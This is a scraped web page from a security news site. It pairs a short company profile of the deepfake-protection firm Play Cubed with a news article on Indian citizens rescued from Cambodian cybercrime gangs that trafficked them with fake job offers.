Play Cubed provides AI Content Protection services via its patent-pending technology Wolfsbane.ai. Play Cubed was founded by Randy Saaf, Octavio Herrera, Fazri Zubair, and Noah Edelman. Our team has been together for over 8 years, with Randy and Octavio having worked together for over 20 years.

Randy and Octavio are proven entrepreneurs with two successful exits valuing nearly $400M. Randy and Octavio are content protection pioneers, having co-founded P2P anti-piracy provider MediaDefender in 2000.

MediaDefender was used by every major music label and movie studio and was acquired by ARTISTDirect in 2005. The Play Cubed team also has a successful history of developing enabling technologies used by top companies such as Major League Baseball, NBA, CBS, ESPN, Mattel, Universal Music, Sony Music, Lionsgate, and many more.

****Contact****

*   **Cofounder**
*   **Octavio Herrera**
*   **Play Cubed**
*   **\[email protected\]**

1.  AI Generated Fake Obituary Websites Target Grieving Users
2.  Employee Duped by AI-Generated CFO in $25.6M Deepfake Scam
3.  Deepfakes Are Being Used to Circumvent Facial Recognition Systems
4.  Deepfake Cyber Attack Hits Russia: Fake Putin Message Broadcasted
5.  McAfee’s Mockingbird AI Tool Detects Deepfake Audio with 90% accuracy

Swalwell for Congress Campaign with Wolfsbane.ai Against AI-Generated Cloning

By Waqas
Indian authorities rescue hundreds trafficked for cybercrime in Cambodia. Victims lured by false jobs, forced to work in…
This is a post from HackRead.com Read the original post: Hundreds of Indians Rescued from Cambodian Cybercrime Gangs

Image credit: Hackread.com

Indian authorities rescue hundreds trafficked for cybercrime in Cambodia. Victims lured by false jobs, forced to work in scams. Read for details and the global fight against human trafficking for cybercrime.

Indian authorities have successfully rescued hundreds of citizens who were lured to Cambodia with false promises of legitimate jobs, only to be forced into working for cybercrime gangs. This news comes after a period of growing concern about human trafficking targeting Indian nationals in Southeast Asia.

The details of the rescue operation remain undisclosed, but a statement from India’s Ministry of External Affairs (MEA) confirmed the success. The MEA spokesperson, Shri Randhir Jaiswal, acknowledged that the ministry, along with the Indian embassy in Cambodia, had previously issued warnings regarding such dangers. However, Jaiswal added that many Indian nationals unfortunately remain trapped in the Southeast Asian country.

****Lured by False Promises****

The rescued individuals were reportedly tricked into travelling to Cambodia under the false pretence of high-paying jobs. Once there, their passports were confiscated, and they were forced to work long hours conducting cybercrime activities for the gangs. These activities likely involved scams like telecom fraud, where victims are tricked into revealing personal information or sending money.

****Global Problem, Regional Focus****

This incident shows the growing problem of human trafficking for cybercrime purposes. In December 2023, a global law enforcement operation codenamed “Storm Makers II” led to the arrest of hundreds of individuals suspected of human trafficking, cybercrime, and other offences. The operation revealed cases involving victims from various countries, including Malaysia, Uganda, and India.

The operation spanned numerous cyber scams, including the case of 40 Malaysians who were enticed to travel to Peru with promises of lucrative employment, as well as several individuals recruited for jobs in Dubai, only to be redirected to Thailand and Myanmar.

It’s also important to mention that last month’s INTERPOL Financial Fraud report highlighted human trafficking as a significant contributor to worldwide cybercrime. The organization pointed to the harmful deployment of Artificial Intelligence (AI) and other technologies as a key reason for the increase.

The Indian government’s efforts to rescue its citizens highlight the regional nature of this issue. Cambodia, along with other Southeast Asian nations, has become a hotspot for cybercrime activity due to factors like lax regulations and unprotected borders.

****What Lies Ahead?****

While the successful rescue is a positive development, the Indian government faces the challenge of repatriating the remaining trapped individuals. Additionally, raising awareness about such scams and improving international cooperation to tackle human trafficking networks are necessary steps to prevent future incidents.

1.  Interpol Arrests 3,500 in Major Cyber Crime Bust
2.  EMPACT Hackathon Targets Online Human Traffickers
3.  AI Generated Fake Obituary Websites Target Grieving Users
4.  Utilizing Programmatic Advertising to Locate Abducted Children
5.  Anonymous Breaches Thai Senate Site against Human Trafficking

Tag

#web